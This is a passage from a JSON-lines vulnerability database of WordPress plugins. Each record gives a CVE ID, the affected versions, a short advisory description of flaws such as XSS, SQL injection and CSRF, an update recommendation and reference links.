version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d47d582d-7c90-4f49-aee1-03a8775b850d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d47d582d-7c90-4f49-aee1-03a8775b850d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108563\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php?old=3073248&old_path=duplicator%2Ftrunk%2Finstaller%2Fdup-installer%2Fmain.installer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108563\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php?old=3073248&old_path=duplicator%2Ftrunk%2Finstaller%2Fdup-installer%2Fmain.installer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48325","slug":"page-builder-add","versionEndExcluding":"1.5.1.6","description":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in PluginOps Landing Page Builder \u2013 Lead Page \u2013 Optin Page \u2013 Squeeze Page \u2013 WordPress Landing Pages.This issue affects Landing Page Builder \u2013 Lead Page \u2013 Optin Page \u2013 Squeeze Page \u2013 WordPress Landing Pages: from n\/a through 1.5.1.5.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-add\\\/wordpress-landing-page-builder-plugin-1-5-1-5-open-redirection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-add\\\/wordpress-landing-page-builder-plugin-1-5-1-5-open-redirection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"calculator-builder","versionEndExcluding":"1.5.1","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6270","slug":"community-events","versionImpact":"1.5","versionEndExcluding":"1.5.1","description":"The Community Events WordPress plugin before 1.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d0a6edc-61e8-42fb-8b93-ef083146bd9c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d0a6edc-61e8-42fb-8b93-ef083146bd9c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3919","slug":"openpgp-form-encryption","versionImpact":"1.5.0","versionEndExcluding":"1.5.1","description":"The OpenPGP Form Encryption for WordPress plugin before 1.5.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e38c7d9-5b6a-4dfc-8f22-3ff30565ce43\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e38c7d9-5b6a-4dfc-8f22-3ff30565ce43\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12615","slug":"passwords-manager","versionImpact":"1.4.8","versionEndExcluding":"1.5.1","description":"The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix value in several AJAX actions in all versions up to, and including, 1.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/admin-page\\\/addon\\\/csv-export\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/admin-page\\\/addon\\\/csv-export\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-categories-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-categories-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce8397d5-6637-4faa-be1f-9cf52c25be9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce8397d5-6637-4faa-be1f-9cf52c25be9b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12614","slug":"passwords-manager","versionImpact":"1.4.8","versionEndExcluding":"1.5.1","description":"The Passwords Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'pms_save_setting' and 'post_new_pass' AJAX actions in all versions up to, and including, 1.4.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins settings and add passwords.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-settings-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-settings-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/898c5554-fd02-47a2-a1f9-1c488cfab57e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/898c5554-fd02-47a2-a1f9-1c488cfab57e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12613","slug":"passwords-manager","versionImpact":"1.4.8","versionEndExcluding":"1.5.1","description":"The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix value in several AJAX fuctions in all versions up to, and including, 1.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec38992-a69f-4ccd-a23b-4dd1639897c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec38992-a69f-4ccd-a23b-4dd1639897c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11341","slug":"eelv-redirection","versionImpact":"1.5","versionEndExcluding":"1.5.1","description":"The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201717\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201717\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa84344-8672-43e1-a430-094021f7366f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa84344-8672-43e1-a430-094021f7366f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3282","slug":"wp-table-builder","versionImpact":"1.5.0","versionEndExcluding":"1.5.1","description":"The WP Table Builder  WordPress plugin through 1.5.0 does not sanitise and escape some of its Table data, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/12bf5e8e-24c9-48b9-b94c-c14ed60d7c15\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/12bf5e8e-24c9-48b9-b94c-c14ed60d7c15\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4715","slug":"structured-content","versionEndExcluding":"1.5.1","description":"The Structured Content WordPress plugin before 1.5.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4394fe86-4240-4454-b724-81464b04123a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4394fe86-4240-4454-b724-81464b04123a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4862","slug":"wpbits-addons-for-elementor","versionImpact":"1.5","versionEndExcluding":"1.5.1","description":"The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f459033-1c95-4781-93f4-1ee5e310933a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f459033-1c95-4781-93f4-1ee5e310933a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php#L560\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php#L560\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php#L868\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php#L868\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php#L716\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php#L716\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php#L2040\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php#L2040\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php#L824\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php#L824\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10482","slug":"media-library-tools","versionImpact":"1.4.0","versionEndExcluding":"1.5.0","description":"The Media File Rename, Find Unused File, Add Alt text, Caption, Desc For Image SEO  WordPress plugin before 1.5.0 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46cbd4bb-b6f3-49e8-8d79-8c378c617e7c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46cbd4bb-b6f3-49e8-8d79-8c378c617e7c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4444","slug":"woo-product-filter","versionImpact":"1.4.9","versionEndExcluding":"1.5.0","description":"The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1.4.9 due to missing authorization checks on various functions. This makes it possible for unauthenticated attackers to perform unauthorized actions such as creating new filters and injecting malicious javascript into a vulnerable site. This was actively exploited at the time of discovery.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30b6b0bf-e632-4e83-89ee-a424382534da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30b6b0bf-e632-4e83-89ee-a424382534da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2527958%40woo-product-filter&new=2527958%40woo-product-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2527958%40woo-product-filter&new=2527958%40woo-product-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11875","slug":"add-infos-to-the-events-calendar","versionImpact":"1.4.1","versionEndExcluding":"1.5.0","description":"The Add infos to the events calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fuss' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.4.1\\\/add_shortcode_to_tec.php?rev=3205090\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.4.1\\\/add_shortcode_to_tec.php?rev=3205090\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.5.0\\\/add-infos-to-the-events-calendar.php?rev=3205090#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.5.0\\\/add-infos-to-the-events-calendar.php?rev=3205090#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f335839-73bc-4ede-9d86-6d8ff93cbecc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f335839-73bc-4ede-9d86-6d8ff93cbecc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47236","slug":"ipages-flipbook","versionEndExcluding":"1.5.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum iPages Flipbook For WordPress.This issue affects iPages Flipbook For WordPress: from n\/a through 1.4.8.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipages-flipbook\\\/wordpress-ipages-flipbook-for-wordpress-plugin-1-4-8-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipages-flipbook\\\/wordpress-ipages-flipbook-for-wordpress-plugin-1-4-8-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12518","slug":"shmapper-by-teplitsa","versionImpact":"1.4.18","versionEndExcluding":"1.5.0","description":"The ShMapper by Teplitsa plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shmMap' shortcode in all versions up to, and including, 1.4.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211065\\\/shmapper-by-teplitsa\\\/trunk\\\/shortcode\\\/shmMap.shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211065\\\/shmapper-by-teplitsa\\\/trunk\\\/shortcode\\\/shmMap.shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e2a443-381c-46cd-85c7-20716f4e59c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e2a443-381c-46cd-85c7-20716f4e59c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4169","slug":"posts-per-cat","versionImpact":"1.4.2","versionEndExcluding":"1.5.0","description":"The Posts per Cat [Unmaintained plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ppc' shortcode in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3292123%40posts-per-cat&new=3292123%40posts-per-cat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3292123%40posts-per-cat&new=3292123%40posts-per-cat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb60874-85c1-40a9-b19d-131c2c2d49ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb60874-85c1-40a9-b19d-131c2c2d49ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6027","slug":"themify-wc-product-filter","versionImpact":"1.4.9","versionEndExcluding":"1.5.0","description":"The Themify \u2013 WooCommerce Product Filter plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018conditions\u2019 parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451db756-9d62-4c8e-b735-e5e5207b81e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451db756-9d62-4c8e-b735-e5e5207b81e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-wc-product-filter\\\/trunk\\\/public\\\/class-wpf-public.php#L604\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-wc-product-filter\\\/trunk\\\/public\\\/class-wpf-public.php#L604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themify.org\\\/changelogs\\\/themify-wc-product-filter.txt\",\"name\":\"https:\\\/\\\/themify.org\\\/changelogs\\\/themify-wc-product-filter.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104239%40themify-wc-product-filter%2Ftrunk&old=3100861%40themify-wc-product-filter%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104239%40themify-wc-product-filter%2Ftrunk&old=3100861%40themify-wc-product-filter%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23646","slug":"new-album-gallery","versionEndExcluding":"1.5.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in A WP Life Album Gallery \u2013 WordPress Gallery plugin <=\u00a01.4.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-4-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-4-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13642","slug":"stratum","versionImpact":"1.4.7","versionEndExcluding":"1.5.0","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Hotspot widget in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228058#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228058#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ccaee26-277e-4730-8242-9b5e6a281fcc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ccaee26-277e-4730-8242-9b5e6a281fcc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43125","slug":"wp-table-builder","versionImpact":"1.4.15","versionEndExcluding":"1.5.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Table Builder WP Table Builder \u2013 WordPress Table Plugin allows Stored XSS.This issue affects WP Table Builder \u2013 WordPress Table Plugin: from n\/a through 1.4.15.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-table-builder\\\/wordpress-wp-table-builder-plugin-1-4-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-table-builder\\\/wordpress-wp-table-builder-plugin-1-4-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10689","slug":"xl-tab","versionImpact":"1.4","versionEndExcluding":"1.5","description":"The XLTab \u2013 Accordions and Tabs for Elementor Page Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4 via the 'XLTAB_INSERT_TPL' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.5, or a newer patched 